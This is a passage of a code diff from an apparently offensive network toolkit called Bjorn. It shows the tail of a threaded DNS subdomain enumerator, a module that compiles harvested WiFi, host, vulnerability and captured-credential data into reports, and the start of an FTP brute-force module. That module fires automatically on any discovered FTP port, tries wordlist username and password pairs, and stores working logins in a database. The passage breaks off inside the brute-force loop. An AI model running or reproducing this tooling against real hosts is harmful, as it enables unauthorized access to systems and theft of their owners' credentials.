timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
filename = os.path.join(self.output_dir, f"dns_enum_{timestamp}.json")
|
||||
|
||||
with open(filename, 'w') as f:
|
||||
json.dump(results, f, indent=4)
|
||||
logging.info(f"Results saved to {filename}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def query_domain(self, domain, record_type):
|
||||
"""Query a domain for specific DNS record type."""
|
||||
try:
|
||||
answers = self.resolver.resolve(domain, record_type)
|
||||
return [str(answer) for answer in answers]
|
||||
except:
|
||||
return []
|
||||
|
||||
def enumerate_domain(self, subdomain):
|
||||
"""Enumerate a single subdomain for all record types."""
|
||||
full_domain = f"{subdomain}.{self.domain}" if subdomain else self.domain
|
||||
results = {'domain': full_domain, 'records': {}}
|
||||
|
||||
for record_type in DEFAULT_RECORD_TYPES:
|
||||
records = self.query_domain(full_domain, record_type)
|
||||
if records:
|
||||
results['records'][record_type] = records
|
||||
with self.lock:
|
||||
self.discovered_domains.add(full_domain)
|
||||
logging.info(f"Found {record_type} records for {full_domain}")
|
||||
|
||||
return results if results['records'] else None
|
||||
|
||||
def load_wordlist(self):
|
||||
"""Load subdomain wordlist or use built-in list."""
|
||||
if self.wordlist and os.path.exists(self.wordlist):
|
||||
with open(self.wordlist, 'r') as f:
|
||||
return [line.strip() for line in f if line.strip()]
|
||||
return ['www', 'mail', 'remote', 'blog', 'webmail', 'server', 'ns1', 'ns2', 'smtp', 'secure']
|
||||
|
||||
def execute(self):
|
||||
"""Execute the DNS enumeration process."""
|
||||
results = {'timestamp': datetime.now().isoformat(), 'findings': []}
|
||||
subdomains = self.load_wordlist()
|
||||
|
||||
logging.info(f"Starting DNS enumeration for {self.domain}")
|
||||
|
||||
with ThreadPoolExecutor(max_workers=self.threads) as executor:
|
||||
enum_results = list(filter(None, executor.map(self.enumerate_domain, subdomains)))
|
||||
results['findings'].extend(enum_results)
|
||||
|
||||
if self.recursive and self.discovered_domains:
|
||||
logging.info("Starting recursive enumeration")
|
||||
new_domains = set()
|
||||
for domain in self.discovered_domains:
|
||||
if domain != self.domain:
|
||||
new_subdomains = [d.split('.')[0] for d in domain.split('.')[:-2]]
|
||||
new_domains.update(new_subdomains)
|
||||
|
||||
if new_domains:
|
||||
enum_results = list(filter(None, executor.map(self.enumerate_domain, new_domains)))
|
||||
results['findings'].extend(enum_results)
|
||||
|
||||
self.save_results(results)
|
||||
return results
|
||||
|
||||
def save_settings(domain, wordlist, output_dir, threads, recursive):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"domain": domain,
|
||||
"wordlist": wordlist,
|
||||
"output_dir": output_dir,
|
||||
"threads": threads,
|
||||
"recursive": recursive
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="DNS Pillager for domain reconnaissance")
|
||||
parser.add_argument("-d", "--domain", help="Target domain for enumeration")
|
||||
parser.add_argument("-w", "--wordlist", help="Path to subdomain wordlist")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for results")
|
||||
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
|
||||
parser.add_argument("-r", "--recursive", action="store_true", help="Enable recursive enumeration")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
domain = args.domain or settings.get("domain")
|
||||
wordlist = args.wordlist or settings.get("wordlist")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
threads = args.threads or settings.get("threads")
|
||||
recursive = args.recursive or settings.get("recursive")
|
||||
|
||||
if not domain:
|
||||
logging.error("Domain is required. Use -d or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(domain, wordlist, output_dir, threads, recursive)
|
||||
|
||||
pillager = DNSPillager(
|
||||
domain=domain,
|
||||
wordlist=wordlist,
|
||||
output_dir=output_dir,
|
||||
threads=threads,
|
||||
recursive=recursive
|
||||
)
|
||||
pillager.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
457
resources/default_config/actions/freya_harvest.py
Normal file
@@ -0,0 +1,457 @@
|
||||
# Data collection and organization tool to aggregate findings from other modules.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/freya_harvest_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -i, --input Input directory to monitor (default: /home/bjorn/Bjorn/data/output/).
|
||||
# -o, --output Output directory for reports (default: /home/bjorn/Bjorn/data/reports).
|
||||
# -f, --format Output format (json, html, md, default: all).
|
||||
# -w, --watch Watch for new findings in real-time.
|
||||
# -c, --clean Clean old data before processing.
|
||||
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import time
|
||||
import shutil
|
||||
import glob
|
||||
import watchdog.observers
|
||||
import watchdog.events
|
||||
import markdown
|
||||
import jinja2
|
||||
from collections import defaultdict
|
||||
|
||||
|
||||
b_class = "FreyaHarvest"
|
||||
b_module = "freya_harvest"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_INPUT_DIR = "/home/bjorn/Bjorn/data/output"
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/reports"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "freya_harvest_settings.json")
|
||||
|
||||
# HTML template for reports
|
||||
HTML_TEMPLATE = """
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Bjorn Reconnaissance Report</title>
|
||||
<style>
|
||||
body { font-family: Arial, sans-serif; margin: 20px; }
|
||||
.section { margin: 20px 0; padding: 10px; border: 1px solid #ddd; }
|
||||
.vuln-high { background-color: #ffebee; }
|
||||
.vuln-medium { background-color: #fff3e0; }
|
||||
.vuln-low { background-color: #f1f8e9; }
|
||||
table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
|
||||
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
|
||||
th { background-color: #f5f5f5; }
|
||||
h1, h2, h3 { color: #333; }
|
||||
.metadata { color: #666; font-style: italic; }
|
||||
.timestamp { font-weight: bold; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Bjorn Reconnaissance Report</h1>
|
||||
<div class="metadata">
|
||||
<p class="timestamp">Generated: {{ timestamp }}</p>
|
||||
</div>
|
||||
{% for section in sections %}
|
||||
<div class="section">
|
||||
<h2>{{ section.title }}</h2>
|
||||
{{ section.content }}
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
class FreyaHarvest:
|
||||
def __init__(self, input_dir=DEFAULT_INPUT_DIR, output_dir=DEFAULT_OUTPUT_DIR,
|
||||
formats=None, watch_mode=False, clean=False):
|
||||
self.input_dir = input_dir
|
||||
self.output_dir = output_dir
|
||||
self.formats = formats or ['json', 'html', 'md']
|
||||
self.watch_mode = watch_mode
|
||||
self.clean = clean
|
||||
|
||||
self.data = defaultdict(list)
|
||||
self.observer = None
|
||||
|
||||
def clean_directories(self):
|
||||
"""Clean output directory if requested."""
|
||||
if self.clean and os.path.exists(self.output_dir):
|
||||
shutil.rmtree(self.output_dir)
|
||||
os.makedirs(self.output_dir)
|
||||
logging.info(f"Cleaned output directory: {self.output_dir}")
|
||||
|
||||
def collect_wifi_data(self):
|
||||
"""Collect WiFi-related findings."""
|
||||
try:
|
||||
wifi_dir = os.path.join(self.input_dir, "wifi")
|
||||
if os.path.exists(wifi_dir):
|
||||
for file in glob.glob(os.path.join(wifi_dir, "*.json")):
|
||||
with open(file, 'r') as f:
|
||||
data = json.load(f)
|
||||
self.data['wifi'].append(data)
|
||||
except Exception as e:
|
||||
logging.error(f"Error collecting WiFi data: {e}")
|
||||
|
||||
def collect_network_data(self):
|
||||
"""Collect network topology and host findings."""
|
||||
try:
|
||||
network_dir = os.path.join(self.input_dir, "topology")
|
||||
if os.path.exists(network_dir):
|
||||
for file in glob.glob(os.path.join(network_dir, "*.json")):
|
||||
with open(file, 'r') as f:
|
||||
data = json.load(f)
|
||||
self.data['network'].append(data)
|
||||
except Exception as e:
|
||||
logging.error(f"Error collecting network data: {e}")
|
||||
|
||||
def collect_vulnerability_data(self):
|
||||
"""Collect vulnerability findings."""
|
||||
try:
|
||||
vuln_dir = os.path.join(self.input_dir, "webscan")
|
||||
if os.path.exists(vuln_dir):
|
||||
for file in glob.glob(os.path.join(vuln_dir, "*.json")):
|
||||
with open(file, 'r') as f:
|
||||
data = json.load(f)
|
||||
self.data['vulnerabilities'].append(data)
|
||||
except Exception as e:
|
||||
logging.error(f"Error collecting vulnerability data: {e}")
|
||||
|
||||
def collect_credential_data(self):
|
||||
"""Collect credential findings."""
|
||||
try:
|
||||
cred_dir = os.path.join(self.input_dir, "packets")
|
||||
if os.path.exists(cred_dir):
|
||||
for file in glob.glob(os.path.join(cred_dir, "*.json")):
|
||||
with open(file, 'r') as f:
|
||||
data = json.load(f)
|
||||
self.data['credentials'].append(data)
|
||||
except Exception as e:
|
||||
logging.error(f"Error collecting credential data: {e}")
|
||||
|
||||
def collect_data(self):
|
||||
"""Collect all data from various sources."""
|
||||
self.data.clear() # Reset data before collecting
|
||||
self.collect_wifi_data()
|
||||
self.collect_network_data()
|
||||
self.collect_vulnerability_data()
|
||||
self.collect_credential_data()
|
||||
logging.info("Data collection completed")
|
||||
|
||||
def generate_json_report(self):
|
||||
"""Generate JSON format report."""
|
||||
try:
|
||||
report = {
|
||||
'timestamp': datetime.now().isoformat(),
|
||||
'findings': dict(self.data)
|
||||
}
|
||||
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
output_file = os.path.join(self.output_dir,
|
||||
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.json")
|
||||
|
||||
with open(output_file, 'w') as f:
|
||||
json.dump(report, f, indent=4)
|
||||
|
||||
logging.info(f"JSON report saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error generating JSON report: {e}")
|
||||
|
||||
def generate_html_report(self):
|
||||
"""Generate HTML format report."""
|
||||
try:
|
||||
template = jinja2.Template(HTML_TEMPLATE)
|
||||
sections = []
|
||||
|
||||
# Network Section
|
||||
if self.data['network']:
|
||||
content = "<h3>Network Topology</h3>"
|
||||
for topology in self.data['network']:
|
||||
content += f"<p>Hosts discovered: {len(topology.get('hosts', []))}</p>"
|
||||
content += "<table><tr><th>IP</th><th>MAC</th><th>Open Ports</th><th>Status</th></tr>"
|
||||
for ip, data in topology.get('hosts', {}).items():
|
||||
ports = data.get('ports', [])
|
||||
mac = data.get('mac', 'Unknown')
|
||||
status = data.get('status', 'Unknown')
|
||||
content += f"<tr><td>{ip}</td><td>{mac}</td><td>{', '.join(map(str, ports))}</td><td>{status}</td></tr>"
|
||||
content += "</table>"
|
||||
sections.append({"title": "Network Information", "content": content})
|
||||
|
||||
# WiFi Section
|
||||
if self.data['wifi']:
|
||||
content = "<h3>WiFi Findings</h3>"
|
||||
for wifi_data in self.data['wifi']:
|
||||
content += "<table><tr><th>SSID</th><th>BSSID</th><th>Security</th><th>Signal</th><th>Channel</th></tr>"
|
||||
for network in wifi_data.get('networks', []):
|
||||
content += f"<tr><td>{network.get('ssid', 'Unknown')}</td>"
|
||||
content += f"<td>{network.get('bssid', 'Unknown')}</td>"
|
||||
content += f"<td>{network.get('security', 'Unknown')}</td>"
|
||||
content += f"<td>{network.get('signal_strength', 'Unknown')}</td>"
|
||||
content += f"<td>{network.get('channel', 'Unknown')}</td></tr>"
|
||||
content += "</table>"
|
||||
sections.append({"title": "WiFi Networks", "content": content})
|
||||
|
||||
# Vulnerabilities Section
|
||||
if self.data['vulnerabilities']:
|
||||
content = "<h3>Discovered Vulnerabilities</h3>"
|
||||
for vuln_data in self.data['vulnerabilities']:
|
||||
content += "<table><tr><th>Type</th><th>Severity</th><th>Target</th><th>Description</th><th>Recommendation</th></tr>"
|
||||
for vuln in vuln_data.get('findings', []):
|
||||
severity_class = f"vuln-{vuln.get('severity', 'low').lower()}"
|
||||
content += f"<tr class='{severity_class}'>"
|
||||
content += f"<td>{vuln.get('type', 'Unknown')}</td>"
|
||||
content += f"<td>{vuln.get('severity', 'Unknown')}</td>"
|
||||
content += f"<td>{vuln.get('target', 'Unknown')}</td>"
|
||||
content += f"<td>{vuln.get('description', 'No description')}</td>"
|
||||
content += f"<td>{vuln.get('recommendation', 'No recommendation')}</td></tr>"
|
||||
content += "</table>"
|
||||
sections.append({"title": "Vulnerabilities", "content": content})
|
||||
|
||||
# Credentials Section
|
||||
if self.data['credentials']:
|
||||
content = "<h3>Discovered Credentials</h3>"
|
||||
content += "<table><tr><th>Type</th><th>Source</th><th>Service</th><th>Username</th><th>Timestamp</th></tr>"
|
||||
for cred_data in self.data['credentials']:
|
||||
for cred in cred_data.get('credentials', []):
|
||||
content += f"<tr><td>{cred.get('type', 'Unknown')}</td>"
|
||||
content += f"<td>{cred.get('source', 'Unknown')}</td>"
|
||||
content += f"<td>{cred.get('service', 'Unknown')}</td>"
|
||||
content += f"<td>{cred.get('username', 'Unknown')}</td>"
|
||||
content += f"<td>{cred.get('timestamp', 'Unknown')}</td></tr>"
|
||||
content += "</table>"
|
||||
sections.append({"title": "Credentials", "content": content})
|
||||
|
||||
# Generate HTML
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
html = template.render(
|
||||
timestamp=datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
|
||||
sections=sections
|
||||
)
|
||||
|
||||
output_file = os.path.join(self.output_dir,
|
||||
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.html")
|
||||
|
||||
with open(output_file, 'w') as f:
|
||||
f.write(html)
|
||||
|
||||
logging.info(f"HTML report saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error generating HTML report: {e}")
|
||||
|
||||
def generate_markdown_report(self):
|
||||
"""Generate Markdown format report."""
|
||||
try:
|
||||
md_content = [
|
||||
"# Bjorn Reconnaissance Report",
|
||||
f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
|
||||
]
|
||||
|
||||
# Network Section
|
||||
if self.data['network']:
|
||||
md_content.append("## Network Information")
|
||||
for topology in self.data['network']:
|
||||
md_content.append(f"\nHosts discovered: {len(topology.get('hosts', []))}")
|
||||
md_content.append("\n| IP | MAC | Open Ports | Status |")
|
||||
md_content.append("|-------|-------|------------|---------|")
|
||||
for ip, data in topology.get('hosts', {}).items():
|
||||
ports = data.get('ports', [])
|
||||
mac = data.get('mac', 'Unknown')
|
||||
status = data.get('status', 'Unknown')
|
||||
md_content.append(f"| {ip} | {mac} | {', '.join(map(str, ports))} | {status} |")
|
||||
|
||||
# WiFi Section
|
||||
if self.data['wifi']:
|
||||
md_content.append("\n## WiFi Networks")
|
||||
md_content.append("\n| SSID | BSSID | Security | Signal | Channel |")
|
||||
md_content.append("|------|--------|-----------|---------|----------|")
|
||||
for wifi_data in self.data['wifi']:
|
||||
for network in wifi_data.get('networks', []):
|
||||
md_content.append(
|
||||
f"| {network.get('ssid', 'Unknown')} | "
|
||||
f"{network.get('bssid', 'Unknown')} | "
|
||||
f"{network.get('security', 'Unknown')} | "
|
||||
f"{network.get('signal_strength', 'Unknown')} | "
|
||||
f"{network.get('channel', 'Unknown')} |"
|
||||
)
|
||||
|
||||
# Vulnerabilities Section
|
||||
if self.data['vulnerabilities']:
|
||||
md_content.append("\n## Vulnerabilities")
|
||||
md_content.append("\n| Type | Severity | Target | Description | Recommendation |")
|
||||
md_content.append("|------|-----------|--------|-------------|----------------|")
|
||||
for vuln_data in self.data['vulnerabilities']:
|
||||
for vuln in vuln_data.get('findings', []):
|
||||
md_content.append(
|
||||
f"| {vuln.get('type', 'Unknown')} | "
|
||||
f"{vuln.get('severity', 'Unknown')} | "
|
||||
f"{vuln.get('target', 'Unknown')} | "
|
||||
f"{vuln.get('description', 'No description')} | "
|
||||
f"{vuln.get('recommendation', 'No recommendation')} |"
|
||||
)
|
||||
|
||||
# Credentials Section
|
||||
if self.data['credentials']:
|
||||
md_content.append("\n## Discovered Credentials")
|
||||
md_content.append("\n| Type | Source | Service | Username | Timestamp |")
|
||||
md_content.append("|------|---------|----------|-----------|------------|")
|
||||
for cred_data in self.data['credentials']:
|
||||
for cred in cred_data.get('credentials', []):
|
||||
md_content.append(
|
||||
f"| {cred.get('type', 'Unknown')} | "
|
||||
f"{cred.get('source', 'Unknown')} | "
|
||||
f"{cred.get('service', 'Unknown')} | "
|
||||
f"{cred.get('username', 'Unknown')} | "
|
||||
f"{cred.get('timestamp', 'Unknown')} |"
|
||||
)
|
||||
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
output_file = os.path.join(self.output_dir,
|
||||
f"report_{datetime.now().strftime('%Y-%m-%d_%H-%M-%S')}.md")
|
||||
|
||||
with open(output_file, 'w') as f:
|
||||
f.write('\n'.join(md_content))
|
||||
|
||||
logging.info(f"Markdown report saved to {output_file}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error generating Markdown report: {e}")
|
||||
|
||||
|
||||
def generate_reports(self):
|
||||
"""Generate reports in all specified formats."""
|
||||
os.makedirs(self.output_dir, exist_ok=True)
|
||||
|
||||
if 'json' in self.formats:
|
||||
self.generate_json_report()
|
||||
if 'html' in self.formats:
|
||||
self.generate_html_report()
|
||||
if 'md' in self.formats:
|
||||
self.generate_markdown_report()
|
||||
|
||||
def start_watching(self):
|
||||
"""Start watching for new data files."""
|
||||
class FileHandler(watchdog.events.FileSystemEventHandler):
|
||||
def __init__(self, harvester):
|
||||
self.harvester = harvester
|
||||
|
||||
def on_created(self, event):
|
||||
if event.is_directory:
|
||||
return
|
||||
if event.src_path.endswith('.json'):
|
||||
logging.info(f"New data file detected: {event.src_path}")
|
||||
self.harvester.collect_data()
|
||||
self.harvester.generate_reports()
|
||||
|
||||
self.observer = watchdog.observers.Observer()
|
||||
self.observer.schedule(FileHandler(self), self.input_dir, recursive=True)
|
||||
self.observer.start()
|
||||
|
||||
try:
|
||||
while True:
|
||||
time.sleep(1)
|
||||
except KeyboardInterrupt:
|
||||
self.observer.stop()
|
||||
self.observer.join()
|
||||
|
||||
def execute(self):
|
||||
"""Execute the data collection and reporting process."""
|
||||
try:
|
||||
logging.info("Starting data collection")
|
||||
|
||||
if self.clean:
|
||||
self.clean_directories()
|
||||
|
||||
# Initial data collection and report generation
|
||||
self.collect_data()
|
||||
self.generate_reports()
|
||||
|
||||
# Start watch mode if enabled
|
||||
if self.watch_mode:
|
||||
logging.info("Starting watch mode for new data")
|
||||
try:
|
||||
self.start_watching()
|
||||
except KeyboardInterrupt:
|
||||
logging.info("Watch mode stopped by user")
|
||||
finally:
|
||||
if self.observer:
|
||||
self.observer.stop()
|
||||
self.observer.join()
|
||||
|
||||
logging.info("Data collection and reporting completed")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Error during execution: {e}")
|
||||
raise
|
||||
finally:
|
||||
# Ensure observer is stopped if watch mode was active
|
||||
if self.observer and self.observer.is_alive():
|
||||
self.observer.stop()
|
||||
self.observer.join()
|
||||
|
||||
def save_settings(input_dir, output_dir, formats, watch_mode, clean):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"input_dir": input_dir,
|
||||
"output_dir": output_dir,
|
||||
"formats": formats,
|
||||
"watch_mode": watch_mode,
|
||||
"clean": clean
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Data collection and organization tool")
|
||||
parser.add_argument("-i", "--input", default=DEFAULT_INPUT_DIR, help="Input directory to monitor")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory for reports")
|
||||
parser.add_argument("-f", "--format", choices=['json', 'html', 'md', 'all'], default='all',
|
||||
help="Output format")
|
||||
parser.add_argument("-w", "--watch", action="store_true", help="Watch for new findings")
|
||||
parser.add_argument("-c", "--clean", action="store_true", help="Clean old data before processing")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
input_dir = args.input or settings.get("input_dir")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
formats = ['json', 'html', 'md'] if args.format == 'all' else [args.format]
|
||||
watch_mode = args.watch or settings.get("watch_mode", False)
|
||||
clean = args.clean or settings.get("clean", False)
|
||||
|
||||
save_settings(input_dir, output_dir, formats, watch_mode, clean)
|
||||
|
||||
harvester = FreyaHarvest(
|
||||
input_dir=input_dir,
|
||||
output_dir=output_dir,
|
||||
formats=formats,
|
||||
watch_mode=watch_mode,
|
||||
clean=clean
|
||||
)
|
||||
harvester.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
268
resources/default_config/actions/ftp_bruteforce.py
Normal file
@@ -0,0 +1,268 @@
|
||||
"""
|
||||
ftp_bruteforce.py — FTP bruteforce (DB-backed, no CSV/JSON, no rich)
|
||||
- Cibles: (ip, port) par l’orchestrateur
|
||||
- IP -> (MAC, hostname) via DB.hosts
|
||||
- Succès -> DB.creds (service='ftp')
|
||||
- Conserve la logique d’origine (queue/threads, sleep éventuels, etc.)
|
||||
"""
|
||||
|
||||
import os
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from ftplib import FTP
|
||||
from queue import Queue
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="ftp_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "FTPBruteforce"
|
||||
b_module = "ftp_bruteforce"
|
||||
b_status = "brute_force_ftp"
|
||||
b_port = 21
|
||||
b_parent = None
|
||||
b_service = '["ftp"]'
|
||||
b_trigger = 'on_any:["on_service:ftp","on_new_port:21"]'
|
||||
b_priority = 70
|
||||
b_cooldown = 1800, # 30 minutes entre deux runs
|
||||
b_rate_limit = '3/86400' # 3 fois par jour max
|
||||
|
||||
class FTPBruteforce:
|
||||
"""Wrapper orchestrateur -> FTPConnector."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.ftp_bruteforce = FTPConnector(shared_data)
|
||||
logger.info("FTPConnector initialized.")
|
||||
|
||||
def bruteforce_ftp(self, ip, port):
|
||||
"""Lance le bruteforce FTP pour (ip, port)."""
|
||||
return self.ftp_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
|
||||
self.shared_data.bjorn_orch_status = "FTPBruteforce"
|
||||
# comportement original : un petit délai visuel
|
||||
time.sleep(5)
|
||||
logger.info(f"Brute forcing FTP on {ip}:{port}...")
|
||||
success, results = self.bruteforce_ftp(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class FTPConnector:
|
||||
"""Gère les tentatives FTP, persistance DB, mapping IP→(MAC, Hostname)."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Wordlists inchangées
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Cache IP -> (mac, hostname)
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
|
||||
self.queue = Queue()
|
||||
|
||||
# ---------- util fichiers ----------
|
||||
@staticmethod
|
||||
def _read_lines(path: str) -> List[str]:
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---------- mapping DB hosts ----------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- FTP ----------
|
||||
def ftp_connect(self, adresse_ip: str, user: str, password: str) -> bool:
|
||||
try:
|
||||
conn = FTP()
|
||||
conn.connect(adresse_ip, 21)
|
||||
conn.login(user, password)
|
||||
try:
|
||||
conn.quit()
|
||||
except Exception:
|
||||
pass
|
||||
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('ftp',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='ftp'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE(COALESCE("database",""),'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread for FTP bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
if self.ftp_connect(adresse_ip, user, password):
|
||||
with self.lock:
|
||||
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user}")
|
||||
self.save_results()
|
||||
self.removeduplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Pause configurable entre chaque tentative FTP
|
||||
if getattr(self.shared_data, "timewait_ftp", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ftp)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords) + 1 # (logique d'origine conservée)
|
||||
if len(self.users) * len(self.passwords) == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
